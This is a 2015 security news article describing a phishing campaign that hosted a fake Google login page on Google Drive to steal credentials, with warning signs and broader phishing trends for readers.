July 30, 2015 By Douglas Bonderud 3 min read

In March of 2014, cybercriminals ran a campaign of Google Drive phishing attacks designed to grab user credentials and gain complete account access. According to Threatpost, researchers at Elastica Cloud Threat Labs have discovered a new effort with eerily similar traits but one significant update: Additional code is now being used to obfuscate the attempted theft. Here’s a quick rundown of the newest Google threat.

Seems Legitimate

With their new effort, attackers hope to trick users into clicking on a provided Google Drive link and enter their login credentials. But how are savvy users getting taken in by this kind of scam? It has to do with Drive itself. While most people use the service to store spreadsheets, photos and text documents, it’s also possible to host entire websites or single Web pages.

As noted by CSO Online, that’s the bait and switch: Drive is used to host a simple Web page that looks like the Google account login screen and asks for user credentials. Extra code is used to obfuscate JavaScript on the page, which collects login credentials and then forwards them to another website.

From the user perspective, everything seems above board. First, they receive an email saying a trusted contact or unknown entity wants to share a Drive document with them. Clicking the link takes them to a fake Google login page — but one that’s actually hosted by Google Drive itself. What’s more, the page also uses Google’s HTTPS and SLL certificate, making it almost impossible to distinguish from the real thing. Once users enter their username and password, they’re redirected to a PDF document, making the entire scam appear legitimate. Account login information, however, is long gone.

According to Aditya K. Sood of Elastica Cloud Threat Labs, there are a few telltale signs that the attack isn’t a legitimate sharing request. First is the header on the fake Drive page, which reads “Google Drive. One Storage.” What it should say is “One account. All of Google.” In addition, the fake page isn’t set up to actually check credentials; it simply sends them along to another server. This means that if users enter the wrong login and password, they’ll still be taken to off-site PDF documents. Finally, there’s a “Create an Account” link that simply reloads the current page.

Phishing Attacks in a Big Pond

While Sood and her colleagues immediately brought the phishing attacks to Google’s attention, this form of compromise continues to be a popular attack vector. According to Firstpost, for example, phishing attacks triggered a “massive surge in DNS threats” through Q2 of 2015, hitting a record high of 133 on the Infoblox DNS Threat Index during the quarter, almost tripling the score of Q2 2014.

While agencies are doing their best to combat phishing scams, many aren’t even sure what they’re looking for. After the recent U.S. Office of Personnel Management (OPM) breach in April, for example, the U.S. Army flagged an email from identity protection firm CSID as a phishing attempt even though the company was employed by OPM to offer affected workers their services. While the email did share some traits of classic phishing scams — such as a dot-com address instead of dot-gov, as would be expected, a link that asks for personal information and clickable “Enroll Now” button — a quick look at the OPM’s official website would have cleared up any confusion.

There’s a massive pool of users leveraging countless secure and not-so-secure online services, giving malicious actors the ability to pick and choose what type they’ll reel in on any given day. As user knowledge increases, however, cybercriminals are turning to obfuscation and subtle misdirection to gain access — to the point that even large-scale government agencies can’t tell the difference. Best bet? Assume there’s a hook at the end of every unsolicited email — it’s never worth the risky bite.

More from

How I got started: Incident responder

3 min read - As a cybersecurity incident responder, life can go from chill to chaos in seconds. What is it about being an incident responder that makes people want to step up for this crucial cybersecurity role?With our How I Got Started series, we learn from experts in their field and find out how they got started and what advice they have for anyone looking to get into the field.In this Q&A, we spoke with IBM’s own Dave Bales, co-lead X-Force Incident Command…

Zero-day exploits underscore rising risks for internet-facing interfaces

3 min read - Recent reports confirm the active exploitation of a critical zero-day vulnerability targeting Palo Alto Networks’ Next-Generation Firewalls (NGFW) management interfaces. While Palo Alto’s swift advisories and mitigation guidance offer a starting point for remediation, the broader implications of such vulnerabilities demand attention from organizations globally.The surge in attacks on internet-facing management interfaces highlights an evolving threat landscape and necessitates rethinking how organizations secure critical assets.Who is exploiting the NGFW zero-day?As of now, little is known about the actors behind the…

How TikTok is reframing cybersecurity efforts

4 min read - You might think of TikTok as the place to go to find out new recipes and laugh at silly videos. And as a cybersecurity professional, TikTok’s potential data security issues are also likely to come to mind. However, in recent years, TikTok has worked to promote cybersecurity through its channels and programs. To highlight its efforts, TikTok celebrated Cybersecurity Month by promoting its cybersecurity focus and sharing cybersecurity TikTok creators.Global Bug Bounty program with HackerOneDuring Cybersecurity Month, the social media…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today